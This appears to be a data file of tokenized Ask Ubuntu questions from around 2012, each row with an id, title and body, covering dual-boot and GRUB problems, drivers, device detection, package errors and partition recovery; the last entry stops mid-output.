143033	will a laptop with hybrid hdd + ssd run ubuntu ?	so my ol ' x71sl is starting to show its age and as much as it saddens me , i think i 'll need a new daily driver and i am very intered in the asus ux32vd . i intend to dual boot if i end up buying it , and i was wondering how that would work out given the dual nature of the storage on this laptop ( a hybrid 500gb hdd + 24gb ssd ) . will ubuntu and windows be able to share the storage space ? if yes , will ubuntu also be able to use the ssd the same way windows will , to speed up the system ? in case this is not the right place for this question , please be so kind as to direct me to another place where i could get an answer .
143034	ubuntu server installer does not detect usb device	for some time now i am struggling with the 12.04 ubuntu server installer . i am trying to execute a clean , cd based install with the mentioned version onto an sd card . for the sake of the simplicity i have taken out the hdd . however , i had to recognise that the `` disk detection '' phase simply can not find the sdcard . it says `` no disk drive was detected . if you know the name of the driver needed by your disk drive , you can select from the list . '' what is really strange that i have tried the older ubuntu server installer ( 11.04 ) and this is simply recognising the sdcard ... does anyone have any idea ? many thanks , peter
143035	ca n't boot into ubuntu after upgrade from ubuntu 11 to 12.04 on dual boot system	running dell inspiron 15r notebook with windows 7 pro and 11.10 ubuntu ( also have windows cr ) . all worked fine until attempted upgrade to 12.04 system which 'locked ' . via windows , uninstalled and reinstalled ubuntu 12.04 . windows install part went okay , but when rebooted to continue installation in 12.04 was only able to boot into grub ( i.e. , grub > prompt ) . have tried to uninstall and reinstall ( via windows ) . also , ran boot-repair cd -- no change . here is the link to the boot-repair 's boot info summary : boot info script 0.61-git-patched [ 23 april 2012 ] ============================= boot info summary : =============================== = > syslinux mbr ( 3.61-4.03 ) is installed in the mbr of /dev/sda . sda1 : __________________________________________________________________________ file system : vfat boot sector type : dell utility : fat16 boot sector info : no errors found in the boot parameter block . operating system : boot files : /dellbio.bin /dellrmk.bin /command.com sda2 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /boot/bcd /wubildr sda3 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /bootmgr /boot/bcd /windows/system32/winload.exe /wubildr /wubildr.mbr sda4 : __________________________________________________________________________ file system : extended partition boot sector type : unknown boot sector info : sda5 : __________________________________________________________________________ file system : ntfs boot sector type : windows xp : ntfs boot sector info : according to the info in the boot sector , sda5 starts at sector 63 . operating system : boot files : sda6 : __________________________________________________________________________ file system : ntfs boot sector type : windows xp : ntfs boot sector info : according to the info in the boot sector , sda6 starts at sector 63 . operating system : boot files : /ubuntu/winboot/wubildr /ubuntu/winboot/wubildr.mbr /ubuntu/disks/root.disk /ubuntu/disks/swap.disk sda6/wubi : _____________________________________________________________________ file system : boot sector type : unknown boot sector info : mounting failed : mount : unknown filesystem type '' sda7 : __________________________________________________________________________ file system : ntfs boot sector type : windows xp : ntfs boot sector info : according to the info in the boot sector , sda7 starts at sector 63 . operating system : boot files : sda8 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : according to the info in the boot sector , sda8 starts at sector 63 . operating system : windows 7 boot files : /bootmgr /boot/bcd /windows/system32/winload.exe sda9 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : according to the info in the boot sector , sda9 starts at sector 319 . but according to the info from fdisk , sda9 starts at sector 1188757504 . operating system : boot files : /bootmgr /boot/bcd /windows/system32/winload.exe ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 640.1 gb , 640135028736 bytes 255 heads , 63 sectors/track , 77825 cylinders , total 1250263728 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes partition boot start sector end sector # of sectors id system /dev/sda1 2,048 206,847 204,800 de dell utility /dev/sda2 206,848 30,926,847 30,720,000 7 ntfs / exfat / hpfs /dev/sda3 * 30,926,848 274,791,824 243,864,977 7 ntfs / exfat / hpfs /dev/sda4 274,791,825 1,250,256,895 975,465,071 f w95 extended ( lba ) /dev/sda5 274,791,888 635,852,699 361,060,812 7 ntfs / exfat / hpfs /dev/sda6 635,852,763 738,251,009 102,398,247 7 ntfs / exfat / hpfs /dev/sda7 738,251,073 1,137,642,974 399,391,902 7 ntfs / exfat / hpfs /dev/sda8 1,137,643,038 1,188,745,739 51,102,702 7 ntfs / exfat / hpfs /dev/sda9 1,188,757,504 1,250,256,895 61,499,392 7 ntfs / exfat / hpfs '' blkid '' output : ________________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/sda1 3030-3030 vfat dellutility /dev/sda2 cc70378a703779f2 ntfs recovery /dev/sda3 ac7c4ec27c4e86d4 ntfs rover1-116gb-c /dev/sda5 01cc9a6fd6feec60 ntfs rover1-176gb-d /dev/sda6 01cc9a6fd8722b70 ntfs rover1-50gb-e-ubuntu /dev/sda7 01cc9a6fd9d739b0 ntfs rover1-190gb-f /dev/sda8 6ad05cc5d05c9961 ntfs rover1-25gb-w7u-32 /dev/sda9 84a8a0eda8a0df44 ntfs rover1-30gb-win8-preview ================================ mount points : ================================= device mount_point type options /dev/sr0 /live/image iso9660 ( ro , noatime ) ======================== unknown mbrs/boot sectors/etc : ======================== unknown bootloader on sda4 00000000 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff | ... ... ... ... ... .| * 000001b0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 fe | ... ... ... ... ... .| 000001c0 ff ff 07 fe ff ff 3f 00 00 00 cc 59 85 15 00 fe | ... ... ? ... .y ... .| 000001d0 ff ff 05 fe ff ff 0b 5a 85 15 66 79 1a 06 00 00 | ... ... .z..fy ... .| 000001e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| 000001f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa | ... ... ... ... ..u.| 00000200 unknown bootloader on sda6/wubi 00000000 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000| * 00000200 =============================== stderr messages : =============================== no volume groups found mdadm : no arrays found in config file or automatically additional information : =================== log of boot-repair 2012-05-27__14h40 =================== boot-repair version : 3.18-0ppa13~lucid boot-sav version : 3.18-0ppa29~lucid /usr/share/boot-sav/gui-g2slaunch.sh : line 91 : hash : glade2script : not found glade2script-gtk2 version : 0.0.1-0ppa4~lucid internet : no-internet internet : no-internet no volume groups found boot-repair is executed in live-session ( debian gnu/linux 6.0.3 ( squeeze ) , squeeze , debian , i686 ) =================== osprober : /dev/sda2 : windows 7 ( loader ) : windows : chain /dev/sda3 : windows 7 ( loader ) : windows1 : chain /dev/sda8 : windows 7 ( loader ) : windows2 : chain /dev/sda9 : windows 7 ( loader ) : windows3 : chain =================== blkid : /dev/sda1 : sec_type= '' msdos '' label= '' dellutility '' uuid= '' 3030-3030 '' type= '' vfat '' /dev/sda2 : label= '' recovery '' uuid= '' cc70378a703779f2 '' type= '' ntfs '' /dev/sda3 : label= '' rover1-116gb-c '' uuid= '' ac7c4ec27c4e86d4 '' type= '' ntfs '' /dev/sda5 : label= '' rover1-176gb-d '' uuid= '' 01cc9a6fd6feec60 '' type= '' ntfs '' /dev/sda6 : label= '' rover1-50gb-e-ubuntu '' uuid= '' 01cc9a6fd8722b70 '' type= '' ntfs '' /dev/sda7 : label= '' rover1-190gb-f '' uuid= '' 01cc9a6fd9d739b0 '' type= '' ntfs '' /dev/sda8 : label= '' rover1-25gb-w7u-32 '' uuid= '' 6ad05cc5d05c9961 '' type= '' ntfs '' /dev/sda9 : label= '' rover1-30gb-win8-preview '' uuid= '' 84a8a0eda8a0df44 '' type= '' ntfs '' /dev/loop0 : type= '' squashfs '' 1 disks with os , 4 os : 0 linux , 0 macos , 4 windows , 0 unknown type os . there is wubi inside sda6 =================== partitions & disks : sda1 : sda , maybesepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , no-os , not-on-gpt-disk , part-has-no-fstab , no-nt , no-winload , no-recov-nor-hid , no-bmgr , no-grldr , no-b-bcd , nopakmgr , nogrubinstall , /mnt/boot-sav/sda1 . sda2 : sda , not-sepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , is-os , not-on-gpt-disk , part-has-no-fstab , no-nt , no-winload , no-recov-nor-hid , bootmgr , no-grldr , boot/bcd , nopakmgr , nogrubinstall , /mnt/boot-sav/sda2 . sda3 : sda , not-sepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , is-os , not-on-gpt-disk , part-has-no-fstab , no-nt , haswinload , no-recov-nor-hid , bootmgr , no-grldr , boot/bcd , nopakmgr , nogrubinstall , /mnt/boot-sav/sda3 . sda5 : sda , maybesepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , no-os , not-on-gpt-disk , part-has-no-fstab , no-nt , no-winload , no-recov-nor-hid , no-bmgr , no-grldr , no-b-bcd , nopakmgr , nogrubinstall , /mnt/boot-sav/sda5 . sda6 : sda , maybesepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , no-os , not-on-gpt-disk , part-has-no-fstab , no-nt , no-winload , no-recov-nor-hid , no-bmgr , no-grldr , no-b-bcd , nopakmgr , nogrubinstall , /mnt/boot-sav/sda6 . sda7 : sda , maybesepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , no-os , not-on-gpt-disk , part-has-no-fstab , no-nt , no-winload , no-recov-nor-hid , no-bmgr , no-grldr , no-b-bcd , nopakmgr , nogrubinstall , /mnt/boot-sav/sda7 . sda8 : sda , not-sepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , is-os , not-on-gpt-disk , part-has-no-fstab , no-nt , haswinload , no-recov-nor-hid , bootmgr , no-grldr , boot/bcd , nopakmgr , nogrubinstall , /mnt/boot-sav/sda8 . sda9 : sda , not-sepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , is-os , not-on-gpt-disk , part-has-no-fstab , no-nt , haswinload , no-recov-nor-hid , bootmgr , no-grldr , boot/bcd , nopakmgr , nogrubinstall , /mnt/boot-sav/sda9 . sda : msdos , not-gpt , biosboot-not-needed , has-no-efipart , 2048 sectors * 512 bytes =================== parted : model : ata toshiba mk6475gs ( scsi ) disk /dev/sda : 640gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags 1 1049kb 106mb 105mb primary fat16 diag 2 106mb 15.8gb 15.7gb primary ntfs boot 3 15.8gb 141gb 125gb primary ntfs 4 141gb 640gb 499gb extended lba 5 141gb 326gb 185gb logical ntfs 6 326gb 378gb 52.4gb logical ntfs 7 378gb 582gb 204gb logical ntfs 8 582gb 609gb 26.2gb logical ntfs 9 609gb 640gb 31.5gb logical ntfs warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : /dev/sr0 : unrecognised disk label =================== mount : aufs on / type aufs ( rw ) tmpfs on /lib/init/rw type tmpfs ( rw , nosuid , mode=0755 ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) udev on /dev type tmpfs ( rw , mode=0755 ) tmpfs on /dev/shm type tmpfs ( rw , nosuid , nodev ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=620 ) /dev/sr0 on /live/image type iso9660 ( ro , noatime ) tmpfs on /live/cow type tmpfs ( rw , noatime , mode=755 ) tmpfs on /live type tmpfs ( rw , relatime ) tmpfs on /tmp type tmpfs ( rw , nosuid , nodev ) fusectl on /sys/fs/fuse/connections type fusectl ( rw ) /dev/sda1 on /mnt/boot-sav/sda1 type vfat ( rw ) /dev/sda2 on /mnt/boot-sav/sda2 type fuseblk ( rw , allow_other , blksize=4096 ) /dev/sda3 on /mnt/boot-sav/sda3 type fuseblk ( rw , allow_other , blksize=4096 ) /dev/sda5 on /mnt/boot-sav/sda5 type fuseblk ( rw , allow_other , blksize=4096 ) /dev/sda6 on /mnt/boot-sav/sda6 type fuseblk ( rw , allow_other , blksize=4096 ) /dev/sda7 on /mnt/boot-sav/sda7 type fuseblk ( rw , allow_other , blksize=4096 ) /dev/sda8 on /mnt/boot-sav/sda8 type fuseblk ( rw , allow_other , blksize=4096 ) /dev/sda9 on /mnt/boot-sav/sda9 type fuseblk ( rw , allow_other , blksize=4096 ) /sys/block/sda : alignment_offset bdi capability dev device ext_range holders inflight power queue range removable ro sda1 sda2 sda3 sda4 sda5 sda6 sda7 sda8 sda9 size slaves stat subsystem trace uevent /sys/block/sr0 : alignment_offset bdi capability dev device ext_range holders inflight power queue range removable ro size slaves stat subsystem trace uevent /dev : block bsg btrfs-control bus cdrom cdrw char console core cpu_dma_latency disk dvd dvdrw fd full fuse hidraw0 hidraw1 hidraw2 hpet initctl input kmsg log makedev md mem net network_latency network_throughput null port ppp psaux ptmx pts random rfkill rtc rtc0 scd0 sda sda1 sda2 sda3 sda4 sda5 sda6 sda7 sda8 sda9 sg0 sg1 shm snapshot snd sndstat sr0 stderr stdin stdout urandom usb v4l vga_arbiter video0 xconsole zero =================== df : filesystem type size used avail use % mounted on aufs aufs 1.7g 8.2m 1.7g 1 % / tmpfs tmpfs 1.7g 0 1.7g 0 % /lib/init/rw udev tmpfs 1.7g 208k 1.7g 1 % /dev tmpfs tmpfs 1.7g 0 1.7g 0 % /dev/shm /dev/sr0 iso9660 340m 340m 0 100 % /live/image tmpfs tmpfs 1.7g 8.2m 1.7g 1 % /live/cow tmpfs tmpfs 1.7g 0 1.7g 0 % /live tmpfs tmpfs 1.7g 8.0k 1.7g 1 % /tmp /dev/sda1 vfat 100m 120k 100m 1 % /mnt/boot-sav/sda1 /dev/sda2 fuseblk 15g 14g 1.3g 92 % /mnt/boot-sav/sda2 /dev/sda3 fuseblk 117g 87g 30g 75 % /mnt/boot-sav/sda3 /dev/sda5 fuseblk 173g 151g 23g 88 % /mnt/boot-sav/sda5 /dev/sda6 fuseblk 49g 40g 9.8g 80 % /mnt/boot-sav/sda6 /dev/sda7 fuseblk 191g 84g 107g 44 % /mnt/boot-sav/sda7 /dev/sda8 fuseblk 25g 16g 8.5g 66 % /mnt/boot-sav/sda8 /dev/sda9 fuseblk 30g 21g 9.1g 70 % /mnt/boot-sav/sda9 =================== fdisk : disk /dev/sda : 640.1 gb , 640135028736 bytes 255 heads , 63 sectors/track , 77825 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x255f86e3 device boot start end blocks id system /dev/sda1 1 13 102400 de dell utility partition 1 does not end on cylinder boundary . /dev/sda2 * 13 1926 15360000 7 hpfs/ntfs /dev/sda3 1926 17105 121932488+ 7 hpfs/ntfs /dev/sda4 17106 77825 487732535+ f w95 ext 'd ( lba ) partition 4 does not start on physical sector boundary . /dev/sda5 17106 39580 180530406 7 hpfs/ntfs /dev/sda6 39581 45954 51199123+ 7 hpfs/ntfs partition 6 does not start on physical sector boundary . /dev/sda7 45955 70815 199695951 7 hpfs/ntfs partition 7 does not start on physical sector boundary . /dev/sda8 70816 73996 25551351 7 hpfs/ntfs partition 8 does not start on physical sector boundary . /dev/sda9 73997 77825 30749696 7 hpfs/ntfs =================== before mainwindow fsck no pastebin yes wubi yes winboot no recommendedrepair , restore , qty_of_part_for_reinstal 0 unhideboot_action yes ( 10s ) , noflag ( sda3 ) part_to_reinstall_grub , force_grub ( ) removabledisk use_separatebootpart ( ) ( , , ) uncomment_gfxmode ata add_kernel_option ( acpi=off ) mbr_to_restore sda ( mbr ) ( sda sda3 ) internet : no-internet =================== actions fsck no pastebin yes wubi yes winboot no recommendedrepair , restore , qty_of_part_for_reinstal 0 unhideboot_action yes ( 10s ) , noflag ( sda3 ) part_to_reinstall_grub , force_grub ( ) removabledisk use_separatebootpart ( ) ( , , ) uncomment_gfxmode ata add_kernel_option ( acpi=off ) mbr_to_restore sda ( mbr ) ( sda sda3 ) mount -o loop /mnt/boot-sav/sda6/ubuntu/disks/root.disk /mnt/boot-sav/wubi1 mount : you must specify the filesystem type warning : unknown mime-type for `` /mnt/boot-sav/wubi1/home '' -- using `` application/octet-stream '' error : no `` view '' mailcap rules found for type `` application/octet-stream '' will restore the mbr_to_restore : sda ( mbr ) into sda dd if=/usr/lib/syslinux/mbr.bin of=/dev/sda 0+1 records in 0+1 records out parted /dev/sda set 3 boot on information : you may need to update /etc/fstab . boot successfully repaired . you can now reboot your computer . internet : no-internet internet : connected paste.debian ko , using paste.ubuntu
143037	what 's difference between version-current and post-release updates for nvidia drivers ?	what 's difference between version-current and post-release updates for nvidia drivers ? can you say which version is installed by selection of those choices ? which one is newer ?
143038	how to detect iphone on xubuntu 12.04 ?	i use xubuntu 12.04 on a macbook air 4,1 . when i plug in ( via usb ) an iphone 3gs , it is not recognized . i installed libimobiledevice2 and ifuse , but that did not help . any ideas ?
143042	lxde : switch tool bar menu and desktop right click menu around	on my desktop i currently have a right click menu that looks like : however , i want to have the full system menu that looks like this show up : how do i do that ?
143046	system76 drivers information and updates	i installed the system76 driver application for my laptop . the system information tab shows my model , and the install drivers tab does something that looks like it 's installing drivers . how can i tell what drivers ( if any ) were actually installed or if there are new versions of the drivers available ?
143050	disable suspend / hibernate via the policykit	i am trying to run lubuntu 12.04 , but if the computer suspends i am unable to bootup again . instead i see the bios post , the hard disk light flickers once and i have to install again ( i have tried to re-install grub2 ) . i am new to linux and what i found that best answered my question was posted by james henstridge . the instructions say to create disable-shutdown.pkla in etc/polkit-1/50-local.d/ but this directory does not exist , so do i create a folder titled 50-local.d in poolkit-1 or do i have to place this file elsewhere ?
143055	how to detect a mobile device when it connects to a home wifi network ?	what would be the best way to have a server recognize when a specific mobile device ( cell phone , ipad , etc . ) connects to the network ( wirelessly , of course ) ? as an example situation , a person has his home wifi network properly configured on his cellphone . when he gets within range of the router , it would connect ( nothing new about that ) . upon connection to that router , his home server would launch a certain program ( or throw a notification , write to a file , etc. ) . i thought that a possible solution would be a network-hosted custom `` web app '' that would be launched from the phone so that the server would recognize the page was called . however , if this could be done when the phone connects automatically , that would be best . any thoughts or alternate solutions would be greatly appreciated , so thanks in advance !
143057	connecting galaxy note : unable to mount android error initializing camera : -53 : could not claim the usb device	i 'm running cm9 ics on my galaxy note and i tried anything i could find googleing around but to no result , if i look on the phone in usb settings there is the option for mass storage but it 's grey and therefore not selectable i don`t know what the problem is but i saw somwhere that it might be an old version of libmtp so i tried to install libmtp 1.1.3 with ./configure make make install but even after when i try mtp-detect it gives me libmtp 1.1.1 is it normal ? anyway when i run mtp-detect here is what it gives me libmtp version : 1.1.1 listing raw device ( s ) device 0 ( vid=04e8 and pid=6860 ) is a samsung gt-p7310/p7510/n7000/i9100/galaxy tab 7.7/10.1/s2/nexus/note . found 1 device ( s ) : samsung : gt-p7310/p7510/n7000/i9100/galaxy tab 7.7/10.1/s2/nexus/note ( 04e8:6860 ) @ bus 2 , dev 6 attempting to connect device ( s ) ignoring usb_claim_interface = -99ptp_error_io : failed to open session , trying again after resetting usb interface libmtp libusb : attempt to reset device ignoring usb_claim_interface = -99libmtp panic : failed to open session on second attempt unable to open raw device 0 ok . thanks in advamce
143059	`` failed to load the package list ''	when attempting to remove , install or update software through the ubuntu software center , i came upon an error like this ... failed to load the package list this is a serious problem . try again later . if this problem appears again , please report an error to the developers . e : could not open file /tmp/aptdaemon-frozen-statussfw5as/status - open ( 2 : no such file or directory ) , e : the package lists or status file could not be parsed or opened . ... or like this what does it mean ? what should i do about it ? a lot of times , software center freezes or loads slowly or nothing at all , and errors would happen , which seems to be the usual behavior ever since first getting ubuntu ( 12.04 ) and i have n't had time to look at them -- but since these errors came up now as `` serious '' , perhaps someone can help me ? : p could these problems be caused by an app i 've downloaded through the software center or terminal ?
143060	configure universal access options from the command-line	what 's a general way to control the accessibility options from the command-line ? these are usually set from the 'universal access ' gui , but i 'd like to know if there is a common way to control these settings that does not rely on the gui .
143064	login broken for software center recommendations	i tried to turn on recommendations for ubuntu software center . it asked me for a username and password , so i tried entering what i thought was my ubuntu one login . now it seems to silently fail getting recommendations and it no longer asks me for software center credentials . when i run usc from the terminal , i see this message : 2012-05-27 16:16:42,919 - softwarecenter.backend.spawn_helper - warning - got error from helper : 'warning : __main__:401 : { 'status ' : '401 ' , 'content-length ' : '22 ' , 'via ' : '1.1 sumac.canonical.com:3128 ( squid/2.7.stable7 ) ' , 'x-cache ' : 'miss from sumac.canonical.com ' , 'x-cache-lookup ' : 'miss from sumac.canonical.com:3128 ' , 'expires ' : 'sun , 27 may 2012 23:16:39 gmt ' , 'vary ' : 'authorization , accept-encoding ' , '-content-encoding ' : 'gzip ' , 'server ' : 'apache/2.2.14 ( ubuntu ) ' , 'last-modified ' : 'sun , 27 may 2012 23:16:39 gmt ' , 'etag ' : ' '' 7e287fc885d9fdcf42da3a12f38572c1 '' ' , 'strict-transport-security ' : 'max-age=2592000 ' , 'cache-control ' : 'max-age=0 ' , 'date ' : 'sun , 27 may 2012 23:16:39 gmt ' , 'content-type ' : 'text/html ; charset=utf-8 ' , 'www-authenticate ' : 'oauth realm= '' softwarecenter agent '' ' } ' 401 is `` unauthorized '' , so i 'm pretty sure there 's a problem with the login information i supplied ( and i 'd say there 's some room for improvement in the interface ) . is there any way to reset it to ask me for login information again ?
143068	need firmware for my broadcom 43xx wireless adapter	where do i get a wireless firmware ( bcm43xx_microcode*.fm ) for my wireless device ?
143071	how do i fix screen with no icons at start-up ?	i just downloaded ubuntu from a cd and the installation went great . i started up the computer , selected ubuntu , put in name and password , but then the screen i get every time is just the ubuntu pink desktop image with no icons at all . the mouse moves fine , but the screen has nothing on it . i can right click with the mouse and create new folders . other than that , pretty much nothing . any thoughts ?
143080	where are all the `alternatives` stored ?	as far as i understand , /etc/alternatives stores only currently selected alternatives . where are all the variants and all the metadata stored ? i have accidentally removed an alternative with galternatives and want to add it back as it was manually ( as galternatives functionality is very limited ) .
143084	install error message when installing on a dell inspiron 4100	i made a live install cd for ubuntu 12.04 to install on my dell inspiron 4100 everytime i get the install going it stops near the end and tell me there is an error and its going to desktop mode so i can figure it out but there is no error code or anything giving me an indication of what the issue might be please help i have no idea what to do
143090	how to show progress bar when booting ?	when i boot ubuntu 12.04 , the progress-bar shows for only a few seconds , then the screen 's background becomes a blank brown image for a long time ( not a constant time ) , then it goes black for a few seconds . at last the desktop shows . i feel bad when screen goes blank . how to show progress bar all the time when booting ?
143098	cpu racing at 30 % or more in virtualbox	i have window 7 64 bit lenovo i7 with 8gb ram and 160gb ssd . i have virtual box version 4.1.16 installed ( most latest to my knowledge ) i want to install ubuntu 12.04 as a guest inside of virtualbox . i have tried a couple of times now . it installs and `` works '' but the cpu in the guest os with no applications running is between 30 % and 100 % . the host machine is running without any slow downs . i have tried all sorts of different settings from within ubuntu and on virtualbox . but ubuntu continues to race . has anyone experienced this ? any help would be appreciated . thanks
143104	partition recovery : how can i insert existing partitions into an extended partition ?	in trying to solve a problem with windows , a tool i was using deleted some of my partitions . i used testdisk to recover my partitions . while it managed to recover all my data partitions , it could n't recover my swap partition . normally , that would n't be a big deal , since it 's easy to create another swap partition . in this case , though , it also did n't find my extended partition , so all my recovered partitions are primary partitions , instead of logical partitions . now , i ca n't create any more . i want to re-create the layout shown in my pre-event fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda5 during installation uuid=65340dbf-705f-409d-8bfa-54f408fe23c9 / ext4 errors=remount-ro 0 1 # /extra was on /dev/sda8 during installation uuid=6921d03e-e64f-4403-9381-be2b2eed62e2 /extra ext4 defaults 0 2 # /home was on /dev/sda6 during installation uuid=b1c33077-6a9b-4e1c-bde5-d44efc96ffbd /home ext3 defaults 0 2 # /windows was on /dev/sda1 during installation uuid=f624495b2449204b /windows ntfs defaults , umask=007 , gid=46 0 0 # swap was on /dev/sda2 during installation # uuid=1e3afc3a-152e-44ab-9275-c5ca30efad0f none swap sw 0 0 # swap was on /dev/sda7 during installation # uuid=2e41ce67-2a25-4ed3-a64e-b5480172477b none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 /dev/mapper/cryptswap2 none swap sw 0 0 # tmpfile stuff tmpfs /tmp tmpfs defaults , size=512m , mode=1777 0 0 tmpfs /var/tmp tmpfs defaults , size=32m , mode=1777 0 0 here 's my current layout , expressed both as fdisk output and a gparted screen shot : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000bfc8b device boot start end blocks id system /dev/sda1 * 2048 41945087 20971520 7 hpfs/ntfs/exfat /dev/sda2 41955328 83898367 20971520 83 linux /dev/sda3 83900416 764268543 340184064 83 linux /dev/sda4 764276373 970486649 103105138+ 83 linux clearly , i do n't want to delete any data to do this . are there any tools that are capable of this ? it seems that if i could write the partition table at a low level , i 'd be able to accomplish this . what do you recommend ? by the way , i use an encrypted home directory ( that 's $ home , not /home ) , and previously my swap was encrypted . i do n't know how encrypted swap is set up .
143107	how to extract archives to file system in terminal ?	i installed jupiter and i use the radiance theme so the icon doesnt look right , so i found this answer on how to change it how can i change the icon for jupiter ? . it mentions needing superuser access and i figured using sudo in terminal would be eaiser than enabling root or whatever i need to do , but i ca n't find anything on here that explains how to extract a tar.bz file to a directory in terminal .
143109	which is the best method to install/uninstall apps in ubuntu ?	while apps can be installed with the apt-get command , synaptic package manager or ubuntu software centre , can anybody throw some light on which is the best method ? i recently installed kubuntu-desktop and as a result even ubuntu software centre showed that it was installed . when i tried uninstalling it with ubuntu software centre , the package did n't actually uninstall until i used synaptic once again .
143112	grub is now the default bootloader and i cant boot without a flashdrive with grub so i can select windows 7	one night i installed ubuntu via live cd a couple times on different size flash-drives and grub is now the default bootloader . i used to could press the power button and it booted directly to windows 7 , now i have to plug in a flash drive , boot from it and select windows 7 from the list . i want to get it back to the default where i can just press power and windows 7 will load . i want to know how to boot directly into windows 7 without having that flash drive . if you can help , please do .
143115	how to disable pin on sim card	my sim card is stuck inside the slot of my laptop and i ca n't get it out without causing further damage to my laptop . every time i log in gnome-shell prompts me for the pin . whether i am about to use it or not . on my phone i know i can disable the pin altogether so that it does n't get requested again ( even if place the sim card on another device ) . how can i do the same in ubuntu ?
143116	how to upgrage ubuntu on a dual boot system ?	i have a dual boot system with a previous 10.4 version of ubuntu and windows 7 . i need to upgrade the existing version of ubuntu while working my dual boot safely . is there a specific way to do that ?
143118	which kernel : i am using 12.04 ubuntu media version	how can i find out what kernel is in my machine . i am using 12.04 ubuntu media version
143119	`` try ubuntu '' option is not dislayed	i created a live usb using unetbootin ( distribution : ubuntu 12.04 ) from the alternate installation iso , but while booting `` try ubuntu '' option is not displayed in unetbootin menu . is there any way to try this ubuntu distribution without installing ?
143127	save and restore nautilus server connection bookmarks	usually i open nautilus \ file \ connect to server . enter some authentication data ( usually ftp ) . login , go to some folder ( usually public_html ) and save bookmark to remote server ( so later folder can be accessed in few clicks ) . here is my question : can this bookmarks ( passwords ) be saved before reinstalling ubuntu , and restored later ?
143140	why is the file /var/crash/_usr_lib_empathy_empathy-chat.1000.upload empty ?	i just experienced an unusual crash : i tried to click on a name entry in the contact list of empathy . a crash happened . usually i am asked then if i 'd like to report the error to launchpad , and launchpad opens . this time the error message was : '' excuse me . ubuntu 12.04 noticed an internal error . if you notice further problems try to restart your computer . send an error report to launchpad to help removing this problem ? '' this time launchpad did not open automatically . a new window opened and i could read the relevant error report . later i found the error report in the file /var/crash/_usr_lib_empathy_empathy-chat.1000.crash . why went the course of action this time differently from other crashes ? why is the file /var/crash/_usr_lib_empathy_empathy-chat.1000.upload empty ?
143142	install issues with ubuntu 12.04 on emachine	i am starting with a blank drive ... trying to install 12.04 system gets to downloading files gets to file 12 of 45 and then blanks the screen and takes me back to the `` desktop '' without finishing the install . can anyone give me an idea on how to fix it
143146	how to create a gif from a movie or dvd etc	i am an absolute newbie so i do n't really understand command prompt . i have downloaded gimp-gap ( is that the best one to use ? ) . i want to make an animated gif from frames of a movie . i have a series of frames in .png that i took from a dvd using vlc video capture . but then what do i do ? i have opened gimp , clicked file-open as layers then selected the files . they appear to load in but then just one huge image comes up in gimp . i have no idea what to do ... not even sure if that was the correct first step ! aaargh ! am so confused . i have been searching web for hours but can only seem to find instruction for windows and photoshop or something . am nearly in tears please help if you can . thank you .
143147	can not install extensions required for gnome shell themes	i keep getting this output : soham @ fortress : ~ $ sudo apt-get install gnome-shell-extensions gnome-tweak-tool reading package lists ... done building dependency tree reading state information ... done gnome-tweak-tool is already the newest version . the following new packages will be installed : gnome-shell-extensions 0 upgraded , 1 newly installed , 0 to remove and 43 not upgraded . 1 not fully installed or removed . need to get 0 b/121 kb of archives . after this operation , 849 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 179291 files and directories currently installed . ) unpacking gnome-shell-extensions ( from ... /gnome-shell-extensions_3.4.1~git20120508.dfd7191a-0ubuntu1~12.04~ricotz0_all.deb ) ... dpkg : error processing /var/cache/apt/archives/gnome-shell-extensions_3.4.1~git20120508.dfd7191a-0ubuntu1~12.04~ricotz0_all.deb ( -- unpack ) : trying to overwrite '/usr/share/locale/lv/lc_messages/gnome-shell-extensions.mo ' , which is also in package gnome-shell-extensions-common 3.2.0-0ubuntu1~oneiric1 no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : 